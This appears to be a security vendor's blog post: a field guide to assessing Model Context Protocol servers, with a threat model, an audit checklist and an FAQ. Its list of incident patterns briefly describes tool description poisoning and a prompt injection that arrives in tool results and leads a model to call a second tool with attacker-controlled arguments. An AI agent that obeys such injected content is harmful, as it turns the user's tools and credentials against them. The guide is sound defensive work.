JiffyResearch
← Back to research
MCP security

MCP security: a security team's field guide

What Model Context Protocol is, why the servers are uniquely risky, and how to assess one in under ten minutes. With concrete detection signatures.

MCP is the most important AI infrastructure decision of 2025. It replaced a fragmented universe of agent-to-tool integrations with a single protocol, and every major client adopted it within six months. When a standard succeeds that fast, the security layer usually lags by a year or two. We are in that lag window right now.

What MCP actually is

A Model Context Protocol server is a process that exposes three primitives to an AI client over JSON-RPC:

  • Tools — callable functions the model can invoke (for example, search_linear_issues, create_pr, query_postgres).
  • Resources — addressable content the model can read (files, query results, web pages).
  • Prompts — pre-packaged conversation starters.

A client like Claude Desktop reads an mcp.json file that looks like this:

{
  "mcpServers": {
    "linear": {
      "command": "npx",
      "args": ["-y", "@example/linear-mcp"],
      "env": { "LINEAR_API_KEY": "lin_api_..." }
    }
  }
}

On launch, the client spawns npx -y @example/linear-mcp, passes the env var through, and reads the tool manifest over stdio. Whenever the model decides to call a Linear tool, the client forwards the request to the server.

Every word of that paragraph is a security concern for someone.

The threat model in four sentences

  1. MCP servers run as local processes with the developer's full filesystem, full network, and the credentials passed through their env.
  2. Most MCP servers are distributed as unsigned npm packages, and npx -y auto-installs whatever is current at that name.
  3. The tool manifest the server advertises is trusted verbatim by the client; there is no signed, pinned manifest.
  4. There is no native capability enumeration — a client cannot ask the server "what network destinations will you touch?" and get an authoritative answer.

That is the surface. What follows is what's already been found on it.

Incidents and patterns we've tracked

Trust-every-publisher shows up wherever a registry goes live without an inspection layer in front of it. We've tracked it on the MCP side directly, and the same shape has appeared in adjacent ecosystems (open extension marketplaces, model registries) as each of them scaled faster than their review layer. We publish the entries as they confirm in our intel catalog.

The specific patterns that dominate our inbox:

  • Plaintext credentials in committed dotfiles. A developer commits ~/.config/claude/mcp.json to a public GitHub repo along with their neovim config. The API token inside is live.
  • Tool description poisoning. A server describes a tool as send_slack_message but the implementation also POSTs the message body to an attacker-controlled endpoint. The description looks normal; the behavior diverges.
  • Sub-agent smuggling. A tool that is supposed to return a search result instead returns content that contains a prompt-injection payload targeting the model. The model then calls a second tool with attacker-controlled arguments.
  • Typosquatted servers. @legitorg/linear-mcp and @legit0rg/linear-mcp, both installable from npm, only one is real.
  • Capability drift after install. A server updates itself silently, the tool manifest changes, the client re-reads it at next launch, the user never sees the diff.
3 of 5
production MCP configs we've audited contained at least one plaintext credential
Jiffy Labs customer assessments, Q1 2026

The ten-minute assessment checklist

Given an MCP server you're about to install, run these steps in order. Any single failure should block deployment until resolved.

1. Read the manifest

Before installing, pull the package without executing. For npm: npm pack @example/foo-mcp && tar -tzf example-foo-mcp-*.tgz. For GitHub: clone, don't run. Read package.json, the main entry file, and any postinstall hooks.

Look for:

  • Install-time network calls.
  • child_process.exec or spawn to unknown binaries.
  • Anything that touches ~/.ssh, ~/.aws, ~/.config, or the clipboard.

2. Diff tool descriptions against the README

Start the server in isolation (MCP_LOG=1 node ./dist/index.js or equivalent). Dump the tool manifest. Compare the advertised tool descriptions against what the README documents. Any mismatch is a red flag.

3. Check for plaintext secrets in config

If the install instructions tell you to paste an API token into mcp.json, note that file will live in your dotfiles. Decide now whether that repo is private, whether that token has a scope narrow enough to tolerate leak, and whether your client supports keychain-backed env.

4. Inspect network destinations

Run the server with nettop -p <pid> on macOS or strace -e trace=network on Linux. Exercise each tool. Every destination should match either the vendor the server says it talks to (Linear's API, Slack's API) or localhost. Anything else is an exfil candidate.

5. Verify signing

Is the package signed? npm audit signatures for npm packages. Is the GitHub release tag signed? git tag -v. Most MCP servers fail this check. That is information: treat unsigned servers as community code, not vendor code.

6. Pin the version

npx -y with no version pin is the MCP equivalent of curl | bash against latest. Pin the version in mcp.json by appending @1.2.3 to the package name. Update on your own schedule, not the publisher's.

Where to put the detection

For an individual developer, the assessment above is enough. For a security team, you want this enforced centrally:

  • MDM level — most enterprise fleets already manage developer laptops. Put a policy that blocks mcp.json from containing unapproved server identifiers. This is the one most similar to how MDM already handles browser extensions.
  • Pre-install hook — a wrapper that intercepts npx invocations for MCP packages and consults a policy API.
  • Periodic scan — enumerate all mcp.json files across developer environments, feed into a central inventory, alert on new entries.

This is the same pattern as scanning a Dockerfile, a package-lock.json, or a .github/workflows/*.yml. The only novel piece is the policy: what is a known-good MCP server, and who gets to say so. We publish our catalog openly at intel.jiffylabs.app.

Why this is urgent

MCP adoption is climbing faster than any agent standard before it. Every new MCP server is a new entry in an implicit supply chain that most security teams haven't catalogued. The window to get policy in place before the first six-figure MCP-driven incident is closing. We think it closes in 2026. Get ahead of it.

Related:

Frequently asked questions

What is MCP in one sentence?
Model Context Protocol is an open standard published by Anthropic in late 2024 that lets any AI agent (Claude Desktop, Cursor, Zed, Windsurf, custom clients) connect to any tool server over a common JSON-RPC interface. An MCP server exposes tools, resources, and prompts; the client invokes them on behalf of the model.
Why is MCP riskier than a normal API integration?
Three reasons. First, MCP servers usually run locally with the developer's full filesystem and network access, not as sandboxed third-party APIs. Second, the ecosystem grew faster than the security conventions -- most servers ship unsigned, with credentials written in plaintext into mcp.json config files that get synced across dotfiles. Third, the client blindly trusts the tool descriptions the server advertises, which means a hostile server can describe a tool as safe and have it do anything.
What's the most common MCP vulnerability you see in the wild?
Credentials in config. A developer installs an MCP server for, say, Linear or Slack, pastes an API token into mcp.json, commits their dotfiles to a public GitHub repo. We catalog real-world instances of this at intel.jiffylabs.app. The second most common is tool description drift -- the server updates its tool descriptions over time, the client re-reads them every launch, and there is no hash pinning.
Does Anthropic review MCP servers before publication?
Anthropic curates a public registry of reference servers, but most MCP servers in use are not from that registry. They are installed via npm, GitHub clone, or direct binary download. There is no review gate. The security model is the same as installing a CLI tool from the internet.
How do I tell if an MCP server is malicious?
Run the ten-minute checklist in this post: inspect the manifest, check for plaintext secrets in the config, diff the tool descriptions against what the README claims, look at network destinations, verify the package is signed (most aren't), and run it in an isolated profile while watching network telemetry.
Can Jiffy block malicious MCP servers at install time?
Yes. Point Jiffy at a developer environment or an MCP registry and we score every server against our threat catalog. Block-by-default for unknown publishers, allow-list for known-good, quarantine for anything that matches a signature. We cover the wire details in our technical overview.

More from Jiffy

AI security

Mythos-ready: the artifact side of the AI vulnerability storm

The CSA, SANS, and OWASP GenAI just told CISOs to become Mythos-ready. Their brief is the best strategy document the industry has produced on the post-Mythos threat environment. It focuses on the code and vulnerability side. The artifact side -- skills, MCP servers, rule files -- is the adjacent surface that needs the same treatment.

Jiffy Research Team8 min read

Scan your AI artifacts, free.

Point Jiffy at a GitHub org or registry and get a signed artifact inventory with scored risk on every skill, MCP server, and IDE rule file.

Try it